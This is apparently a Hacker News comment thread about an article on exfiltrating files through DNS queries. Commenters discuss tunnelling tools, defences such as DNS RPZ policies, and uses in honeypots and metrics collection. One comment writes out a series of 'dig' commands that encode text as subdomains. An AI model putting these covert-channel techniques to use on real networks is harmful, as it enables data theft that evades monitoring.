[HN Gopher] Exfiltrate Files Using the DNS
___________________________________________________________________
Exfiltrate Files Using the DNS
Author : moviuro
Score : 51 points
Date : 2021-04-01 14:03 UTC (8 hours ago)
(HTM) web link (www.go350.com)
(TXT) w3m dump (www.go350.com)
| geocrasher wrote:
| WGET requests can also be used to exfiltrate data:
| https://miscdotgeek.com/curlytp-every-web-server-is-a-dead-d...
| _wldu wrote:
| I think an allow-based DNS RPZ policy could potentially address
| this. If you could define the names that clients ought to talk
| to. It maybe a moving target, but worth trying.
|
| https://tools.ietf.org/id/draft-vixie-dnsop-dns-rpz-00.html
|
| https://lists.redbarn.org/pipermail/dnsfirewalls/2013-March/...
| bmurray7jhu wrote:
| Thinkst Canary use DNS tunnelling to facilitate comms with
| honeypots. DNS tunnelling a great way to monitor activity on
| controlled access networks without opening ports and
| substantially expanding the attack surface.
|
| https://help.canary.tools/hc/en-gb/articles/360002425837-Wha...
| BuildTheRobots wrote:
| Worth mentioning the Iodine project which allows for arbitrary
| IPv4 to be tunnelled over DNS, which can be useful on a few
| different restrictive networks.
|
| https://code.kryo.se/iodine/
|
| (I also like the naming pun; DNS running on port 53 with Iodine
| having the atomic number 53.)
| lazyweb wrote:
| I'm running one on an older RPi at home. Never really "needed"
| it, but sending text messages for free from an airplane wifi
| somewhere above the atlantic ocean felt like a nice nerdy flex.
| sybercecurity wrote:
| I've seen it work on most wifi networks where you need to log
| in (or check a box) on a web portal before access. Basically
| anything that uses HTTP redirect captive portals will
| probably work, as UDP port 53 isn't blocked.
| ignoramous wrote:
| For a variation of this technique see this handy privacy-
| preserving metrics collection golang library that uses DNS:
| https://github.com/Jigsaw-Code/choir
|
| Currently used by the Jigsaw group at Google to collect metrics
| from behind censoring ISPs.
| LinuxBender wrote:
| Along this line, it might be fun to set up an encrypted text chat
| server that uses this method. What records would work best,
| rrsig, txt?
| ampdepolymerase wrote:
| Only if you are using DNS over https.
| zamadatix wrote:
| Why not https over DNS :)
| nilsb wrote:
| One could probably do DTLS over DNS.
| yardstick wrote:
| If you are using https/TLS it doesn't really matter what
| inner protocol you use, because it's encrypted so third
| parties can't validate it.
| toast0 wrote:
| If you're using DNS over TLS (or HTTPS, whatever) to the
| origin, sure third parties are limited.
|
| If you're doing DNS over TLS to a public resolver that then
| transmits to an origin, that resolver is a third party that
| can see requests and responses.
| silon42 wrote:
| I guess this is reason enough to block that (DNS over
| TLS)
| m463 wrote:
| dig hi.001.mydomain.com dig how.002.mydomain.com
| dig are.003.mydomain.com dig you.004.mydomain.com
| cookiengineer wrote:
| You don't need that. TTL zero and dns query header IDs are
| enough. You could even implement a threaded chat, using the
| id as a responded-to sorting mechanism.
|
| Also, TXT can contain binary data, and when using DNS over
| TCP is pretty much unlimited in frame size.
| btbuilder wrote:
| I saw a presentation at Schmoocon around 2005 where streaming
| video over DNS was demonstrated.
| eat_veggies wrote:
| This is also possible to do over the browser (just one-way
| communication, unfortunately) using dns-prefetch tags:
|
| https://github.com/veggiedefender/browsertunnel
| 1vuio0pswjnm7 wrote:
| In the text-only browser I use I disable dns-prefetch by
| editing the source code. It may be possible to disable dns-
| prefetch in Firefox through configs.^1 Good luck with other
| browsers.
|
| 1. https://www.ghacks.net/2013/04/27/firefox-prefetching-
| what-y...
| gumby wrote:
| > Once upon a time, a government auditor insisted to me that
| keystroke loggers had to run as root, otherwise they would not
| function properly. So, I wrote a keystroke logger that ran as a
| normal user and showed it to him.
|
| > He wasn't amused. He said that I was violating government IT
| policy by demonstrating the program to him.
|
| I once had a government inspector write us up because the
| secondary containment for our waste solvents was plastic, not
| stainless steel (the instruments emitted the solvents into glass
| containers, so this is just for spillage or minor overflows). I
| pointed out that these solvents were highly reactive with metals
| and our safety officer had specified plastic. She didn't care, so
| we got a ticket.
|
| I went and got some stainless steel pans and placed the plastic
| containers inside them. Then I wrote back that I had purchased
| the steel pans and that the glass collection vessels were now
| enclosed with the steel pans. They canceled the ticket.
|
| Generally I'm in favor of safety regulations but sometimes the
| enforcers are nuts. This was not the only such run in I've had.
___________________________________________________________________
(page generated 2021-04-01 23:02 UTC)